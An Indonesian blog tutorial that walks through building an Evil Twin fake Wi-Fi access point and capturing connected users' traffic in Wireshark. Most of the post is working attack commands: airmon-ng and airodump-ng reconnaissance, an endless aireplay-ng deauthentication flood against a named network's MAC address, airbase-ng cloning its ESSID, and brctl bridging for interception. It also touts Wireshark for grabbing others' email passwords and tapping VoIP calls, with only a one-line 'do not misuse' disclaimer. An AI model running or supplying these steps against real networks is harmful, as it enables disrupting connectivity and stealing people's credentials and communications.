» » » Membuat Fake AP (Evil Twin) Dan Melihat Log User Dengan Wireshark

Membuat Fake AP (Evil Twin) Dan Melihat Log User Dengan Wireshark

,

Assalamualaikum Wr.Wb

  Sudah lama sekali sepertinya saya tidak upload materi lagi hehehe, Pada kesempatan kali ini saya akan membagikan materi tentang Evil Twin (Fake AP) dan Wireshark, Sebelum kita memulai konfigurasi nya alangkah baik nya saya akan menjelaskan dulu apa itu Wireshark dan apa itu Evil Twin (Fake AP)

  • Pengertian Wireshark
  Wireshark merupakan salah satu dari tool Network Analyzer yang biasa digunakan oleh Network Administrator pemecahan masalah jaringan, analisis, perangkat lunak dan pengembangan protokol komunikasi, dan pendidikan. Awalnya bernama Ethereal, dan pada Mei 2006 proyek ini berganti nama menjadi WIreshark karena masalah merek dagang. Bahasa Pemrograman yang digunakan adalah bahasa C dengan lisensi public umum GNU.
  • Kegunaan Wireshark
  1. Wireshark dipakai oleh network administrator untuk menganalisa kinerja jaringannya. Wireshark mampu menangkap paket-paket data atau informasi yang berjalan dalam jaringan yang terlihat dan semua jenis informasi ini dapat dengan mudah dianalisa yaitu dengan memakai sniffing , dengan sniffing diperoleh informasi penting seperti password email account lain.
  2. Wireshark merupakan software untuk melakukan analisa lalu-lintas jaringan komputer, yang memiliki fungsi-fungsi yang amat berguna bagi profesional jaringan, administrator jaringan, peneliti, hingga pengembang piranti lunak jaringan.
  3. Wireshark dapat membaca data secara langsung dari Ethernet, Token-Ring, FDDI, serial (PPP dan SLIP), 802.11 wireless LAN, dan koneksi ATM.
  4. Program ini juga sering digunakan oleh chatters untuk mengetahui ip korban maupun para chatter lainnya lewat typingan room.
  5. Tool wireshark dapat menganalisa transmisi paket data dalam jaringan, proses koneksi dan transmisi data antar komputer.
  6. Selama kita bisa mendapatkan paket langsung dari jaringan, dengan tools seperti wireshark, maka kita juga bisa memanfaatkan wireshark untuk ‘menyadap’ pembicaraan Voice over IP.
  • Pengertian Evil Twin
 Evil Twin adalah sebuah Accses point palsu yang di buat sengaja untuk mengecoh para pengguna, dengan nama (SSID) (Service Set Identification) yang sama bahkan nyaris tidak berbeda dengan legitimate AP atau AP yang sah.   Hal ini lah yang mengakibatkan banyak para pengguna jaringan wireless terkecoh dan masuk dalam jebakan pelaku, selanjutnya pelaku dapat dengan leluasa melakukan sniifing, phissing, dan ilegall activiti lainya  dengan  menggunakan teknik man in the middle attack. Terdapat dua jenis serangan pada evil twin, pertama yaitu evil twin di konfigurasikan menggunakan IP getway yang di samakan dengan router AP oleh pelaku ,sedangkan yang kedua evil twin AP di konfigurasikan menggunakan getway yang berbeda dengan router AP.

Note : Tutorial ini sebagai sarana ilmu belajar security networking jangan di salah gunakan 

Langung saja kita mulai tutorial nya

1. Ubah mode interface wireless (wlan0) laptop/pc anda ke mode monitor, Cara merubah ke mode monitor adalah dengan sc airmon-ng start wlan0 dan otomatis interface anda akan berubah ke mode monitor dan nama interface wireless anda beruabh yang awalnya wlan0 berubah menjadi wlan0mon

2.  Untuk melihat nama interface kita berubah bisa kita lihat dengan sc iwconfig dan disitu terlihat wlan0 berubah ,enjadi wlan0mon
 3. Selanjutnya kita lanjutkan untuk melihat WiFi di sekitar kita dengan sc airodump-ng wlan0mon dan otomatis akan menampilkan ESSID Wifi yang ada di sekitar kita, Dan disini saya memilih ESSID Raihan

4. Kita lanjutkan dengan Deauth Attack ke Wifi Raihan dengan sc aireplay-ng -0 0 -a 14:4D:67:B6:DC:1C wlan0mon, -0 means deauthication, angka 0 lagi itu mengirim paket ke target (jika kita gunakan 0 itu tidak ada stop nya kecuali crtl+c), 14:4D:67:B6:DC:1C ini adlah MAC Address dari si Wifi tersebut, dan wlan0mon interface wireless kita yang dalam mode monitor

5. Kita airbase agar lebih gampang saja, gunakan sc airbase-ng 14:4D:67:B6:DC:1C -e Raihan -c 1 wlan0mon, -e itu adalah ESSID wifi dari MAC Address tersebut dan -c itu adalah channel si Wifi tersebut


 6. Jika sudah kita install package bridge-utils yang bergua untuk membuat sebuah segmen jaringan baru. apt-get install bridge-utils

7.  Dan kita bikin segmen jaringan bridge baru dengan nama fake dengan sc brctl addbr fake

8. Selanjutnya bikin arahkan interface fake tadi eth0 dengan sc brctl addif fake eth0

9. Dan kita bikin, Sekalian juga kita arahkan ke at0 dengan sc brctl addif fake at0

10. Kita lanjut kan dengan penambahan Ip Address bridge pada interface at0 dan kita UP juga interface at0 dengan sc ifconfig at0 (ip address) up

11. Jika kita UP interface at0 kita juga UP juga interface fake dengan sc ifconfig fake up

12. Dan kita buka aplikasi Wireshark dan kita capture interface at0

12. Nah jika ada seseorang yang masuk ke jaringan Wifi palsu kita maka dia akan terdeteksi di Log Wireshark

Mungkin sekian saja materi Evil Twin dan Wireshark nya kemungkinan minggu depan kita upload lagi tentang materi Evil Twin dan Wireshark nya

Dan jangan lupa untuk stay safe saat lagi pandemi begini jangan lupakan protokol kesehatan yang di anjurkan dari pemerintah dan tetap #StayAtHome

Sekian dan Wassalamualaikum Wr.Wb

Kirim pertanyaan ke email fast respon

0 Response to "Membuat Fake AP (Evil Twin) Dan Melihat Log User Dengan Wireshark"

Post a Comment

Subscribe to: Post Comments (Atom)